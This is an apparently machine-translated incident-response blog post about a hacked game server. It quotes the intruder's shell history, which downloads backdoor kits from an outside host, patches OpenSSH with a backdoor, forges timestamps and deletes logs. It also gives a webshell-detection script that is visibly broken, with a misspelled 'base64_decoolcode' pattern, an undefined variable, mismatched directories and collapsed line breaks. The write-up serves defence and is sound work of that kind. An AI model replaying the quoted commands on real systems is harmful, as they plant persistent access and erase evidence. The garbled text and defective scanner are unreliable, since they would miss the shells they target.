Backdoor implantation experience and solutions

Backdoor implantation experience and solutions

I found that many programs on the server were infected with Trojans and handled trojan files together with developers. This morning I found that the game background could not be opened again. On the server I found that all the portal files of the background program were deleted, index is restored. php, admin. php can be accessed normally. No one has ever accessed the server at night. You can determine that the server has been intruded and start troubleshooting:

1. First view the security log. Specify the command as follows:
More/var/log/secure | grep Accepted

By viewing the command output, the following records are doubtful:
Jul 28 05:32:17 localhost sshd [21684]: Accepted password for root from 103.231.104.70 port 3551 ssh2
Jul 28 05:37:52 localhost sshd [22754]: Accepted password for root from 103.231.104.70 port 3602 ssh2
Jul 28 05:44:40 localhost sshd [23396]: Accepted password for root from 103.231.104.70 port 3650 ssh2

This record shows that at 05:32, the root account successfully logged on to the system from the 103.231.104.70 ip address. The ip address 103.231.104.70 was found to be an address of the Hong Kong Special Administrative Region and should be a proxy machine.

2. Start to view the system log message and wtmp log. No problems have been found.

3. Start Viewing History commands and find the problem:

  387  cp -p /etc/ssh/sshd_config{,.bak}  388  wget www.k2a.cn/Tools/open.tar.gz  406  cd /etc/ssh/  407  ls  408  wget www.k2a.cn/Tools/patch.tar.gz  409  ls  410  tar -zxvf open.tar.gz  411  tar -zxvf patch.tar.gz  412  cd openssh-5.9p1.patch/  413  cp sshbd5.9p1.diff ../openssh-5.9p1  414  cd ../openssh-5.9p1  415  patch diff  416  vim includes.h  417  ssh -V  418  vim includes.h  419  vi version.h  420  ssh -V  421  vi version.h  422  ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5  423  make  424  make install  425  id  426  touch -r sshd_config.bak ssh_config  427  cd ..  428  touch -r sshd_config.bak ssh_config  429  service sshd reload  430  ls  431  rm -rf *.tar.gz  432  rm -rf open*  433  rm -rf *.bak  437  cd /var/log/  439  rm -rf wtmp  440  rm -rf *log  442  cd /etc/scl/prefixes/  448  rm -rf *

Through the history above, we can find that attackers have installed ssh backdoors on the server. I have also found several articles about ssh backdoors. If you are interested, please refer to them:

Http://www.bkjia.com/Article/201309/242910.html

As mentioned in the above article, the attacker has modified the ssh version and used ssh-V to check whether it is a previous version. The current emergency solution is as follows:
Reinstall the openssh software and update it to the latest version.

Change the default ssh port

Add an ssh access policy to iptable

When you reinstall the new openssh version, make & make install reports the following error:
Cannot remove '/usr/bin/ssh': Operation not permitted

Use lsattr to view and find that uSia attributes are added to ssh. Use chattr to remove all these attributes and reinstall them!
After installation, use ssh-V to check whether the version is correct.

The development colleagues also help find the trojan in the Code. The script is as follows:
 

#!/bin/bash#re=$(find -name "*.php" |xargs grep -l "common") if [ ! -d "$myPath"]; then        mkdir /tmp/safelogfi function checksafe(){   path="/home/web/$1"   cd $path   #re=$(find -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc")   re=$(find -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc|eval\(\\$\_POST\[|assert\(\\$\_POST\[")   len=$(expr length "$re")   if [ $(echo "$len > 0" | bc) -eq 1 ]; then                  echo "$re" > /opt/safelog/$1_$(date +%Y%m%d).txt         #echo "$re" > $path/cache/safelog/$(date +%Y%m%d).txt   fi   modifytime $i} function modifytime(){    re=$(find -mtime -1 -type f -name \*.php)    len=$(expr length "$re")    if [ $len -gt 0 ]; then            echo "$re" > /opt/safelog/$1_mf_$(date +%Y%m%d).txt       #echo "$re" > $path/cache/safelog/mf_$(date +%Y%m%d).txt    fi} ls=$(cd /home/web;ls) for i in $lsdo  echo "$i"  checksafe $idone